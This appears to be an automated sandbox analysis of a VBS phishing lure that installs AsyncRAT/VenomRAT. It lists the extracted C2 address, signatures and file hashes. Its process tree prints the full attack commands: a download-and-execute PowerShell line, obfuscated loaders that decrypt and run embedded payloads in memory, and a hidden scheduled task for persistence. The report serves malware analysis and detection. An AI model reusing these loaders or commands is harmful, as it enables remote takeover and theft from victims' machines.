Analysis

  • max time kernel
    93s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17-12-2024 16:28

General

  • Target

    EmployeeBenefitsBonusDocs2024.vbs

  • Size

    66KB

  • MD5

    db10d2a27be78c780e5757b46a265e6d

  • SHA1

    36f720617c0f2eb5fd700dc06714fb069dea7eb9

  • SHA256

    6096bee06cb4d3d603d6e200d9c4a81f80c1b0fb892fd05cb56c85d50e52c83d

  • SHA512

    58e90ac9142a2221c24bf82eb24207097c2d1121c005db1533c646ce2ed461fc1318eab619a524930094711554436ca02de05a722d12cbad0cbed7da33f307c7

  • SSDEEP

    1536:813BEKsxa+9hxSiZUq50BPW8TzigIMGX5TXx2ChW3/V79j8:/KMaYhciZtuFVVIMGJXx2P8

Malware Config

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Dec2024

C2

45.88.88.7:6845

Mutex

zmkdvkzgwmnzhgvxwwk

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • VenomRAT 1 IoCs

    Detects VenomRAT.

  • Venomrat family
  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\EmployeeBenefitsBonusDocs2024.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:388
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2864
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -NoExit -Command Invoke-Expresshiog(Infoke-WebRequest -Uri "https://emptyservices.vip/stub.txt" -UceBasingcorlijzationg = 'your_fixed_token_here' }).Content
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1692
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:992
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:536
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'svchoststr288_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\inicia_str_288.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4720
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\inicia_str_288.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:2220
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\inicia_str_288.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:5080
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('byPitpttrKOr9S4gS51RiwODtTqtgx9LZXuwqMXWA4g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KLxX3z6JPX89+JmQWr32sA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZBnGU=New-Object System.IO.MemoryStream(,$param_var); $vupQr=New-Object System.IO.MemoryStream; $leNdx=New-Object System.IO.Compression.GZipStream($ZBnGU, [IO.Compression.CompressionMode]::Decompress); $leNdx.CopyTo($vupQr); $leNdx.Dispose(); $ZBnGU.Dispose(); $vupQr.Dispose(); $vupQr.ToArray();}function execute_function($param_var,$param2_var){ $QBcFyzORlfFvkyN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg=$QBcFyzORlfFvkyN.EntryPoint; $eoxDpSmmlmQGNeDwSiumwcziYkJcAoZkRcmWGkOEDoRsISaNHINmPlrcPoEejkLWmFPLSHPHuQIhkgzfkVuSBNvFLjhsGKutDUgcdpVaSfSYDjSIOyToPTuzkjZIzxbJvpEpawcVauZwUwcBryDhQg.Invoke($null, $param2_var);}$lH = 'C:\Users\Admin\AppData\Roaming\inicia_str_288.bat';$host.UI.RawUI.WindowTitle = $lH;$cAKjuebouz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lH).Split([Environment]::NewLine);foreach ($fH in $cAKjuebouz) { if ($fH.StartsWith('::')) { $S=$fH.Substring(2); break; }}$payloads_var=[string[]]$S.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:448

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    a26df49623eff12a70a93f649776dab7

    SHA1

    efb53bd0df3ac34bd119adf8788127ad57e53803

    SHA256

    4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245

    SHA512

    e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    ff2ebc63009127bf2c74f18dc727774e

    SHA1

    603a245252097e9b8d6823e08a76361ba94f7720

    SHA256

    5048a68ea6a51a2a93fba28d043dbcc8ae067225e4e1b9569a74caac617e9a42

    SHA512

    15b4baf594f91eba3ad7d390859140220da191bfc9de2eeeca5455a643ce5b19cd88b221e354d6a577df799564cc73285f2418108d2b850630196053ac53007b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tyjplkzv.xo0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\c.bat

    Filesize

    62KB

    MD5

    b318d9f0c62b86e1c78917fa43630e1f

    SHA1

    e57533546987c2f91db873ab2b756bd752deafda

    SHA256

    4b429c11db344779526f0cdacc411ec8835f2682d5212ad5f5b0c1d48020a028

    SHA512

    b0417872bd1234e1ac2ecf80c14396ab92f177d54edeb1cc296b2f51af0138f3bfd11f2431f879ad59abfefb9fa83ec93e4c9ce8e14abd79cd1faf1c9217a75c

  • C:\Users\Admin\AppData\Roaming\inicia_str_288.vbs

    Filesize

    114B

    MD5

    d1d0f729a878d5943a30c1700cfc3c72

    SHA1

    3ddfaf32a7203d6770116b88627a7fc530a42698

    SHA256

    ca0773e06fe660c95d26fad85762928696d3a522e2f885a923c4e8081343a4bd

    SHA512

    0a644b21eae9b46b0027d04b4b16d939076d267307051381180c0b581ffde332f18e6c8994dfd77e0bc1620c0ce4284a97c22cbc322495f45d3df85a725d9089

  • memory/448-65-0x0000013BF8A70000-0x0000013BF8A88000-memory.dmp

    Filesize

    96KB

  • memory/536-34-0x00000176C48E0000-0x00000176C48F2000-memory.dmp

    Filesize

    72KB

  • memory/536-33-0x00000176C48D0000-0x00000176C48D8000-memory.dmp

    Filesize

    32KB

  • memory/1692-12-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1692-17-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1692-16-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

    Filesize

    8KB

  • memory/1692-15-0x0000022E6A6D0000-0x0000022E6A746000-memory.dmp

    Filesize

    472KB

  • memory/1692-14-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1692-13-0x0000022E69C80000-0x0000022E69CC4000-memory.dmp

    Filesize

    272KB

  • memory/1692-0-0x00007FFBFD203000-0x00007FFBFD205000-memory.dmp

    Filesize

    8KB

  • memory/1692-11-0x00007FFBFD200000-0x00007FFBFDCC1000-memory.dmp

    Filesize

    10.8MB

  • memory/1692-1-0x0000022E51630000-0x0000022E51652000-memory.dmp

    Filesize

    136KB